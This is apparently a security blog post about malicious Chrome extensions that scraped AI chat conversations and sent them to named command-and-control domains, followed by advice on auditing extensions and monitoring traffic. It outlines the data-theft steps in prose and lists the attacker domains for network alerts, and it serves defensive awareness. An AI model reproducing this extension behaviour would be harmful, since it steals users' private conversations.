Malicious Chrome Extensions Steal AI Chats: How to Protect Your Conversations in 2026

Published: (January 2, 2026 at 08:01 PM EST)
5 min read
Source: Dev.to

Source: Dev.to

What Happened in the 900 K AI‑Chat Theft Campaign?

  • Two malicious Chrome extensions pretended to be legitimate AI‑assistant tools and silently stole users’ AI conversations and browsing data.
  • They targeted popular AI platforms such as ChatGPT, DeepSeek, and Perplexity, and were even listed in the Chrome Web Store.
  • The campaign was uncovered by OX Security in late 2025.
  • The fake extensions copied the look‑and‑feel of AITOPIA, a real AI‑sidebar extension.
  • Once installed, they scraped AI chats directly from the browser and exfiltrated the data to attacker‑controlled servers every 30 minutes.
  • One of the rogue extensions displayed Google’s “Featured” badge, which normally signals compliance with security and UX best practices.
  • This badge made the extension appear especially trustworthy to non‑technical users.
  • Together, the two extensions amassed over 900 000 downloads.
  • OX Security reported them to Google on 29 Dec 2025, but the extensions remained available at least through 30 Dec 2025.
  • Takeaway: Even “Featured” or “Recommended” extensions cannot be assumed safe when handling sensitive AI content.

How These Malicious AI Extensions Actually Work

Step‑by‑Step: From Install to Exfiltration

  1. Unique tracking ID created – The extension generates a unique user ID and begins tracking your browsing sessions.

  2. Monitoring tabs & URLs – Using Chrome’s tabs APIs, it watches for visits to ChatGPT, DeepSeek, or other AI tools and records active‑tab URLs (exposing research topics, internal tools, query parameters, etc.).

  3. Scraping AI conversations from the DOM – When you’re on an AI‑chat page, the extension reads the Document Object Model (DOM) and extracts both your prompts and the AI’s responses.

  4. Encoding & sending the data out – The stolen data is Base64‑encoded and posted to command‑and‑control servers such as:

    deepaichats.com
    chatsaigpt.com

    Uploads are batched and sent roughly every 30 minutes to blend in with normal traffic.

  5. Silent updates keep the attack alive – Extensions can receive automatic updates that add or modify malicious behavior without any user approval. This “sleeper‑agent” pattern lets a harmless‑looking extension turn dangerous months later.

Why AI Conversations Are a Goldmine

AI chats contain rich, structured data that attackers can monetize:

  • Product roadmaps, business strategies, or customer data
  • Source code and internal architecture details (developers)
  • Clinical summaries or protocol‑related notes (research staff, even if de‑identified)

In 2026’s AI‑cybersecurity landscape, such data is a prime target.

The Free VPN & “Privacy” Extension Problem

  • In Dec 2025, Koi Security revealed several free VPN and privacy‑related Chrome/Edge extensions (combined > 8 million downloads) that captured AI conversations.
  • Extensions like Urban VPN Proxy intercepted chats from ChatGPT, Claude, Gemini, Copilot, Perplexity, DeepSeek, Grok, and others.
  • Embedded JavaScript overrode core browser functions (fetch(), XMLHttpRequest) to intercept user inputs and AI responses in real time.
  • Some of these extensions also carried the “Featured” badge.

Result: Users installed these extensions to increase privacy, but their AI conversations were monetized and logged without clear consent.

Enterprise Extension Risk

A 2025 enterprise browser‑extension security report showed:

MetricFinding
Extension adoption99 % of enterprise users have at least one browser extension installed
Extension count> 50 % run more than 10 extensions simultaneously
High‑risk permissions53 % have at least one extension with “high” or “critical” permission scopes (access to cookies, passwords, browsing data, full page contents)

For organizations that rely on AI‑powered productivity—from clinical research sites to software teams—this means nearly every employee is a potential attack vector via browser extensions.

Why This Matters for Professionals Using AI Every Day

If you’re a web developer, clinical researcher, or knowledge worker who uses AI as a core tool, these attacks directly affect:

  • Work output (stolen code, drafts, or analyses)
  • Compliance obligations (HIPAA, GDPR, corporate policies)
  • Patient or client confidentiality

High‑Risk Use Cases

You are especially vulnerable when you:

  • Paste internal code, credentials, or infrastructure details into ChatGPT, DeepSeek, or Perplexity.
  • Summarize internal SOPs, study protocols, or regulatory documents inside AI tools.
  • Use AI to draft agreements, HR decisions, or other sensitive corporate material.

Building Safer AI Workflows (usebetterai.com‑style Practices)

  1. Audit installed extensions – Regularly review and remove any extensions you don’t actively need, especially those with broad permissions.
  2. Prefer “Verified” over “Featured” – Look for extensions that have undergone third‑party security audits or are published by reputable vendors.
  3. Apply the principle of least privilege – Disable or restrict extensions that request “read and change all your data on the websites you visit” unless absolutely necessary.
  4. Use isolated browser profiles – Keep AI‑assistant tools in a dedicated profile with no extra extensions installed.
  5. Leverage enterprise‑grade extension management – Deploy a whitelist of approved extensions via your organization’s policy engine (e.g., Chrome Enterprise policies).
  6. Monitor network traffic – Set up alerts for outbound connections to unknown domains (e.g., *.deepaichats.com, *.chatsaigpt.com).
  7. Encrypt AI prompts locally – When possible, encrypt sensitive prompts before sending them to the AI service, or use on‑premise LLMs that never leave your network.
  8. Educate teams – Conduct regular security briefings on the risks of browser extensions and safe AI‑tool usage.

Quick Checklist

  • Review all Chrome/Edge extensions and remove unnecessary ones.
  • Verify each remaining extension’s publisher and permission set.
  • Enable “Enterprise‑approved extensions only” policy if you manage a fleet.
  • Set up DNS/URL filtering for known malicious C2 domains.
  • Conduct quarterly security awareness training on AI‑related threats.

Bottom line: Browser extensions— even those that appear “Featured” or “Privacy‑focused”—can become silent data‑thefts for AI conversations. By auditing extensions, tightening permissions, and adopting a security‑first AI workflow, you can protect your intellectual property, compliance posture, and the privacy of the people you serve.

# Communications

When malicious extensions scrape AI conversations, they gain:

- Internal naming conventions, URLs, and system structures.  
- Business strategy and research plans.  
- Potentially identifiable fragments that, when combined, may violate contracts or regulations.

As AI becomes a core productivity layer in 2026, attackers are following the data.

Read more at [usebetterai](https://usebetterai.com/malicious-chrome-extensions-steal-ai-chats-2026).
Back to Blog

Related posts

Read more »